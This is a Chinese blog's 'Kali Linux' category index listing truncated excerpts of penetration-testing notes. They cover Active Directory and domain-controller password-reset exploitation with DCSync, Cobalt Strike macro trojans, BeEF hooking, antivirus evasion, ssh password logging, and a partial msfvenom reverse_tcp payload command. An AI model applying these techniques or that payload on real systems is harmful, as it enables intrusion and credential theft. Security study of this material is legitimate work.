随笔分类 - Kali Linux
摘要:贴一份笔记而已 最近没空写文章了 好好复习一下笔记 环境我用的god.org这个域 又看东西的时候遇到ldap基础相关的知识了 复习手写笔记 详细可以参考灵腾文章和harmj0y文章 http://www.harmj0y.net/blog/activedirectory/a-pentesters-g
阅读全文
摘要:随手记 能访问到目标域控井且知道域控计算机名即可利用该漏洞 .该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为windows,该漏洞的稳定利用方式为重置目标域控的密码, 然后利用城控凭证进行Dc sync获取域管权限后修复域控密码,之所以不直接使用域控凭证远程执行命令,是因为域控账户是不可
阅读全文
摘要:简单记录 →SMB: 服务器消息块(SMB)协议是一种网络文件共享协议,在Microsoft Windows中实现称为Microsoft SMB协议。SMB允许您共享文件,磁盘,目录,打印机等。在Windows 2000之前,SMB过去通过TCP / IP端口139与NetBIOS一起运行。因此,建
阅读全文
摘要:贴上使用笔记 不多介绍了 很简单的东西 msfvenom各平台生成木马大全: windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/sh
阅读全文
摘要:水一水最近玩的工具 弄dll注入的时候用到的 介绍这款老工具 免杀效果一般。。但是简单实用 目录: 0x01 backdoor-factory简介 0x02 特点功能 0x03 具体参数使用 PS:后门添加私钥证书 https://tools.kali.org/exploitation-tools/
阅读全文
摘要:最近老是觉得自己白天工作累,晚上理应休息 堕落了几天才发觉自己真垃圾,加紧向前吧。 0x00 前言 在平时渗透还是工作中经常会遇到shell反弹的情况,网上一搜反弹shell都是一大堆,但是真正遇到反弹shell的时候你真的懂了反弹shell 的payload 的? 这篇会细致总结下常见反弹shel
阅读全文
摘要:docker:有两个版本:docker-ce(社区版)和docker-ee(企业版)。 参考官网地址:https://docs.docker.com/engine/installation/linux/docker-ce/ubuntu/#os-requirements docker-compse:可
阅读全文
摘要:Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的项目。利用它我们可以生成绕过杀软的 payload kali 上并未安装,下面我们来进行简单的安装。我们直接从 github 上进行 clone 下载: git clone [https://www.github.
阅读全文
摘要:今天测试某个站点时读hash老出错 这里做下读hash的笔记 进去meterpreter后getuid一 1 2 meterpreter > getuid Server username: NT AUTHORITY\SYSTEM 1 2 meterpreter > getuid Server use
阅读全文
摘要:0×01 利用Cobalt strike生成木马 这里我们生成木马可以用cs带的HTA、OFFICE宏、word宏来使目标上线cs,这里以word宏病毒为例子。 首先我们需要制作一个word宏病毒来进行远控操作。在Cobalt strike中,需要新建一个监听程序来进行监听,如下图: 然后点击att
阅读全文
摘要:0x00 前言 BeEF,全称The Browser Exploitation Framework,是一款针对浏览器的渗透测试工具。 用Ruby语言开发的,Kali中默认安装的一个模块,用于实现对XSS漏洞的攻击和利用。 BeEF主要是往网页中插入一段名为hook.js的JS脚本代码,如果浏览器访问
阅读全文
摘要:在使用linux时,经常需要进行文件查找。其中查找的命令主要有find和grep。两个命令是有区的。 区别:(1)find命令是根据文件的属性进行查找,如文件名,文件大小,所有者,所属组,是否为空,访问时间,修改时间等。 (2)grep是根据文件的内容进行查找,会对文件的每一行按照给定的模式(pat
阅读全文
摘要:什么是nc nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听,nc可以作为server以TCP或UDP方式侦听指定端口 (2)端口的扫描,nc可以作为client发起TCP或UDP连接
阅读全文
摘要:0x01 场景 现在有个攻击场景,就是你拿到了linux外网服务器的webshell,要做内网渗透前肯定要收集信息。其中可以做的一个工作是重新编译ssh来记录管理员的密码信息,信息可以用来撞其他机器的密码。下面就从linux的提权开始 0x02 过程 反弹shell linux下为啥要反弹出一个sh
阅读全文
摘要:Linux下做地址NAT有很多种方法。比如haproxy、nginx的4层代理,linux自带的iptables等都能实现。其实,Linux下有一个叫rinetd的工具,安装简单,配置也不复杂。 下载地址:http://www.boutell.com/rinetd/http/rinetd.tar.g
阅读全文
摘要:端口扫描 auxiliary/scanner/portscanscanner/portscan/ack ACK防火墙扫描scanner/portscan/ftpbounce FTP跳端口扫描scanner/portscan/syn SYN端口扫描scanner/portscan/tcp TCP端口扫
阅读全文
摘要:0x00 前言 大家都知道在平时的漏扫中,AWVS、APPSCAN、Netspark、webspectort等漏扫工具扫描出来的漏洞问题往往存在误报,这时我们就需要进行人工手动验证漏洞,这里我们有两种思路: 一是在漏洞工具中,进行多次的重复测试,AWVS、APPSCAN、Netspark、websp
阅读全文
